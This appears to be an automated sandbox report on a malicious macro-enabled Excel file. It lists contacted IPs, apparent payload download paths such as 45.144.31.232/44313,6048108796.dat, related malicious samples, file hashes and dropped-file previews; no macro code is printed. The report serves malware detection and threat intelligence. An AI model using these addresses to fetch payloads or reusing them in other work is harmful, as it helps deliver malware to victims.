                                                                                                                              		unknown
                                                                                                                              https://graph.windows.net/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                		high
                                                                                                                                https://api.powerbi.com/beta/myorg/importsF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://devnull.onenote.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://ncus.pagecontentsync.F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://messaging.office.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://augloop.office.com/v2F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://skyapi.live.net/Activity/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/macF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://dataservice.o365filtering.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://api.cortana.aiF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://onedrive.live.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devicesF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://directory.services.F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    82.118.21.70
                                                                                                                                                    		unknownUkraine
                                                                                                                                                    		204957GREENFLOID-ASUAfalse
                                                                                                                                                    45.144.31.232
                                                                                                                                                    		unknownUnited Kingdom
                                                                                                                                                    		42994HQservCommunicationSolutionsILfalse
                                                                                                                                                    185.45.193.80
                                                                                                                                                    		unknownUnited Arab Emirates
                                                                                                                                                    		60117HSAEfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                    Analysis ID:403443
                                                                                                                                                    Start date:04.05.2021
                                                                                                                                                    Start time:06:01:34
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 38s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:9177284661-04302021.xlsm
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:23
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • GSI enabled (VBA)
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal80.troj.expl.evad.winXLSM@1/8@0/3
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    45.144.31.2329177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.31.232/44313,6048108796.dat
                                                                                                                                                    185.45.193.809177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 185.45.193.80/44313,6048108796.dat

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    GREENFLOID-ASUA9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 82.118.21.70
                                                                                                                                                    EgW5u2WYG2.exeGet hashmaliciousBrowse
                                                                                                                                                    • 45.134.255.99
                                                                                                                                                    7IXb5bOTOQ.exeGet hashmaliciousBrowse
                                                                                                                                                    • 45.134.255.61
                                                                                                                                                    DU61r0xvZ7.exeGet hashmaliciousBrowse
                                                                                                                                                    • 82.118.23.184
                                                                                                                                                    TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
                                                                                                                                                    • 91.90.195.7
                                                                                                                                                    10ba8cb2_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                    • 195.123.238.191
                                                                                                                                                    SThy2G7fGR.exeGet hashmaliciousBrowse
                                                                                                                                                    • 45.134.255.61
                                                                                                                                                    65cb803d8339bc32863bd557a882cf2016ad7945b18f3.exeGet hashmaliciousBrowse
                                                                                                                                                    • 45.134.255.61
                                                                                                                                                    73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.90.59.97
                                                                                                                                                    73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.90.59.97
                                                                                                                                                    73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.90.59.97
                                                                                                                                                    kVXWdr5oFQ.exeGet hashmaliciousBrowse
                                                                                                                                                    • 195.123.233.63
                                                                                                                                                    t.exeGet hashmaliciousBrowse
                                                                                                                                                    • 195.123.237.105
                                                                                                                                                    scan-remittance-slip.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 82.118.23.217
                                                                                                                                                    Shipping-Documents.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 82.118.23.217
                                                                                                                                                    Remittance Advice - MA CONSULTING.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 82.118.23.217
                                                                                                                                                    amCz0268Nl.exeGet hashmaliciousBrowse
                                                                                                                                                    • 45.134.255.61
                                                                                                                                                    Contract_372758654-1.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 195.123.244.129
                                                                                                                                                    Contract_372758654-1.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 195.123.244.129
                                                                                                                                                    apr.21.A.31573147172-04202021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 82.118.23.186
                                                                                                                                                    HQservCommunicationSolutionsIL9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.31.232
                                                                                                                                                    73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.80
                                                                                                                                                    73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.80
                                                                                                                                                    73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.80
                                                                                                                                                    d658fc2e_by_Libranalysis.docmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.166
                                                                                                                                                    d658fc2e_by_Libranalysis.docmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.166
                                                                                                                                                    d658fc2e_by_Libranalysis.docmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.166
                                                                                                                                                    figure-04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.200
                                                                                                                                                    figure-04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.200
                                                                                                                                                    figure-04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.200
                                                                                                                                                    Anfrage-04.14.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 91.194.11.70
                                                                                                                                                    Anfrage-04.14.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 91.194.11.70
                                                                                                                                                    Anfrage-04.14.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 91.194.11.70
                                                                                                                                                    CompensationClaim-1416897608-04152021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.16
                                                                                                                                                    CompensationClaim-1416897608-04152021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.16
                                                                                                                                                    Suspect.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106
                                                                                                                                                    Compensation_690949256_04132021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106
                                                                                                                                                    Suspect.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106
                                                                                                                                                    Compensation_690949256_04132021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106
                                                                                                                                                    malw.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):134558
                                                                                                                                                    Entropy (8bit):5.368373000591703
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:zcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:AEQ9DQW+zPXO8
                                                                                                                                                    MD5:7943F9F555A0A5B35484924AB84AE27D
                                                                                                                                                    SHA1:CBD7599EF713FFE16C6FA5BB1E14736E677269CA
                                                                                                                                                    SHA-256:50F4E95050F712083129FCCF8E09E7F0B673D6AA09B6B26BF8813125D8D6F280
                                                                                                                                                    SHA-512:0CB69B6519A829BF5418E607EF05D13BDF632F97D71530FCF7FB046C1B448CBF7E3AC05E7219EDB6D8C0538240215BC36C0C74DA4F9695635B755046A7A202C1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T04:02:31">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\195EC58F.jpg
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):92379
                                                                                                                                                    Entropy (8bit):7.654577060340879
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
                                                                                                                                                    MD5:4A425E6A5A885C0D0E2589506FD2244B
                                                                                                                                                    SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
                                                                                                                                                    SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
                                                                                                                                                    SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\EE720000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):117957
                                                                                                                                                    Entropy (8bit):7.69158533653563
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:A5a7PmbCvKINbjvw548LMb/oqKO8NnS8+60KcL:A5ayDAbT648LM7D98Np+Ew
                                                                                                                                                    MD5:7446C62B26F3B52F6D9A984F6771968A
                                                                                                                                                    SHA1:97910D27E2CEADD2A2F09849062422D46BAAAF59
                                                                                                                                                    SHA-256:E0DD16FE1A4B568218CDF8A3C71A3C8F245438C10D4EF67B271A81E77ABEDBE9
                                                                                                                                                    SHA-512:B624FDF79730FEBE42FC013D71B59244F01625FBB3CE30236AC478B4CA895AD05C987F59B5D570F62AF13AAE151A2D1AAE993DDC87DDB8512D926487029FF0E4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9177284661-04302021.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:27:01 2020, mtime=Tue May 4 12:02:35 2021, atime=Tue May 4 12:02:35 2021, length=117952, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2236
                                                                                                                                                    Entropy (8bit):4.673524035961049
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8ZbmtQAF8jHCD+HJ77aB6myZbmtQAF8jHCD+HJ77aB6m:8ZbmNFYJiB6pZbmNFYJiB6
                                                                                                                                                    MD5:74FA1AA7539C02D950B137C7AFE2009D
                                                                                                                                                    SHA1:A3B3FA965CFDD06B6D73D738EAD4DBA41302C1B9
                                                                                                                                                    SHA-256:76B0DE305D3C914A064AFFB3FF85CB9C30646BAB8A5E673B441CB7295103BC4D
                                                                                                                                                    SHA-512:F9A5A1C378E0DD991A8F1D20AD149D022CE094968E0EBB8F19A748D394CF56EA911A703F810B422311CFE08EFDE29177B824CAFBAC3DFA57DAB971542B00851F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.... ....0.$>...B....@..B....@...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...RFh....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qb{..user..B.......N...RFh.....S.....................7v.e.n.g.i.n.e.e.r.....~.1.....>Qc{..Desktop.h.......N...RFh.....Y..............>......'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2......RLh .917728~1.XLS..b......>Qa{.RLh.....R....................IP..9.1.7.7.2.8.4.6.6.1.-.0.4.3.0.2.0.2.1...x.l.s.m.......a...............-.......`...........>.S......C:\Users\user\Desktop\9177284661-04302021.xlsm../.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.9.1.7.7.2.8.4.6.6.1.-.0.4.3.0.2.0.2.1...x.l.s.m.........:..,.LB.)...A}...`.......X.......325494...........!a..%.H.VZAj...O...1........-$..!a..%.H.VZAj...O...1........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 18:52:18 2019, mtime=Tue May 4 12:02:35 2021, atime=Tue May 4 12:02:35 2021, length=12288, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):917
                                                                                                                                                    Entropy (8bit):4.657023284259249
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8uU+20U+WCHo6I2y3w8+WMjA+N/E2ybD83/IeYIe8k44t2Y+xIBjKZm:8Vjw1AS8HD+J7aB6m
                                                                                                                                                    MD5:660D3DA6BBCC8E29D7C27D3148A431AA
                                                                                                                                                    SHA1:7020B2870451FD670EB2BA4432DDA87ABC70B040
                                                                                                                                                    SHA-256:E8997C8AAA499DCFD8DDD8FB34A576568E698A3535AF2D52442C332FA63929BC
                                                                                                                                                    SHA-512:472BDF2E41CA45F56503686718E4D10C36D2DCB1C184C0DD9167C9E1711475D4124F79EB2D2E248504145BBA35CE8E85149423024D1EA5B1F3C7E42F1FAD7AF6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F..........h.!-...?...@..>{...@...0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...RFh....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qb{..user..B.......N...RFh.....S.....................7v.e.n.g.i.n.e.e.r.....~.1......RRh..Desktop.h.......N...RRh.....Y..............>.....%.O.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......H...............-.......G...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A}...`.......X.......325494...........!a..%.H.VZAj...,,/..........-$..!a..%.H.VZAj...,,/..........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):123
                                                                                                                                                    Entropy (8bit):4.686205681789939
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:bDesBVomxW7SNRfRg9rlNRfRg9rlmxW7SNRfRg9rlv:bSsjQc2pZ2pZc2p1
                                                                                                                                                    MD5:871B42915595DE2EBB2F446CD7EAA5AE
                                                                                                                                                    SHA1:A7825CBFA29A607B1EC703FE705D405E0D259A1A
                                                                                                                                                    SHA-256:B7F9561E39BC18C1D2843A95701D3E2654EBB52EE5BF5B8A4FFCFE941CC71DC9
                                                                                                                                                    SHA-512:9BC17D4439644B01529DF2B3AB0F335C38B626CBB51AD2D086ED03FF01DCA18E2CF35DB8B39638FB8383AE6D300C773999B99BE4D8883770123041E3D193DAF9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: [folders]..Desktop.LNK=0..[misc]..9177284661-04302021.LNK=0..9177284661-04302021.LNK=0..[misc]..9177284661-04302021.LNK=0..
                                                                                                                                                    C:\Users\user\Desktop\D1820000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):117952
                                                                                                                                                    Entropy (8bit):7.691007150042473
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:X5a6vKINbjvw548LMb/oqKO8NnS8+60Kcj:X5arAbT648LM7D98Np+Ec
                                                                                                                                                    MD5:0A4A383CD1D7C4DA7A74098AFE637C89
                                                                                                                                                    SHA1:C9E1F6F6C33144EC690A465F0BF98F4275B5A608
                                                                                                                                                    SHA-256:FC2058C473E2551E8D03AEFA74F9C21914F64700AC377EC00831AEA96351290B
                                                                                                                                                    SHA-512:5CDE5BC046D9142878D3DF6421FB9FFC3956814E6C643EEC61957978B1FBB27579C2CD62E85CA0464140D1DFEBE67A111EA3AA072610CB52233D24F96EB7B07B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\~$9177284661-04302021.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                    MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                    SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                    SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                    SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.679226664040162
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                    • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                    File name:9177284661-04302021.xlsm
                                                                                                                                                    File size:114788
                                                                                                                                                    MD5:a8b4e37766d35b543884d8882147eaa2
                                                                                                                                                    SHA1:4356c14118ea9098dabb6d9af620003b7929058a
                                                                                                                                                    SHA256:533c8713c4e10c223a9f8139f9d408ca326aee14a1d88382c91f2ff18cf0f93c
                                                                                                                                                    SHA512:581ee69b843a7657677e1f6b74147f273f340474ff36de56b1d579d0364ccc6c27c2f9dedf4d855bc2841351957a3620dc0327153ff4ff3dc87a2c6ad7eb8a6f
                                                                                                                                                    SSDEEP:3072:K6vKINbjvw548LMb/oqKO8NnS8+60Kcxtc:6AbT648LM7D98Np+Et
                                                                                                                                                    File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "/opt/package/joesandbox/database/analysis/403443/sample/9177284661-04302021.xlsm"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:False
                                                                                                                                                    Application Name:unknown
                                                                                                                                                    Encrypted Document:False
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:True

                                                                                                                                                    Summary

                                                                                                                                                    Author:Rabota
                                                                                                                                                    Last Saved By:Noped
                                                                                                                                                    Create Time:2015-06-05T18:19:34Z
                                                                                                                                                    Last Saved Time:2021-04-30T08:26:34Z
                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                    Security:0

                                                                                                                                                    Document Summary

                                                                                                                                                    Thumbnail Scaling Desired:false
                                                                                                                                                    Company:
                                                                                                                                                    Contains Dirty Links:false
                                                                                                                                                    Shared Document:false
                                                                                                                                                    Changed Hyperlinks:false
                                                                                                                                                    Application Version:16.0300

                                                                                                                                                    Streams with VBA

                                                                                                                                                    VBA File Name: Byutut.bas, Stream Size: 1343
                                                                                                                                                    General
                                                                                                                                                    Stream Path:VBA/Byutut
                                                                                                                                                    VBA File Name:Byutut.bas
                                                                                                                                                    Stream Size:1343
